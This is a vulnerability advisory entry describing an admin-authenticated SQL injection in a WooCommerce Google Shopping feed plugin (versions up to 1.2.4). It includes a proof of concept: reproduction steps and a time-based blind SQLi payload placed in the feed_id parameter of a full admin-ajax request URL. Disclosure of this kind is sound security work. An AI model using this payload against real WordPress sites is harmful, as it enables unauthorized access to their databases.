WordPress Plugin Vulnerabilities
Sync WooCommerce Product feed to Google Shopping <= 1.2.4 - Admin+ SQLi
Description
The plugin uses the 'feed_id' POST parameter which is not properly sanitized for use in a SQL statement, leading to a SQL injection vulnerability in the admin dashboard
Proof of Concept
Install WooCommerce and 'Exportfeed for Woocommerce Google Product Feed' plugins Perform initial config for the WooCommerce plugin and create a product In the ExportFeed plugin settings go to Create Feed and Click Custom Product Feed, search for a product and capture the request with an intercepting proxy. Modify the feed_id parameter with 1 AND (SELECT 2347 FROM (SELECT(SLEEP(5)))Otih) https://example.com/wp-admin/admin-ajax.php?security=a5e2dfc8ec&action=gcpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.php&keywords=snake&category=&brand=&sku=&merchat_type=Google&service_name=Google&limit=0,10&q=showT&feed_id=1 AND (SELECT 2347 FROM (SELECT(SLEEP(5)))Otih)
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
0xdecafbad
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-07 (about 2 years ago)
Added
2022-03-07 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)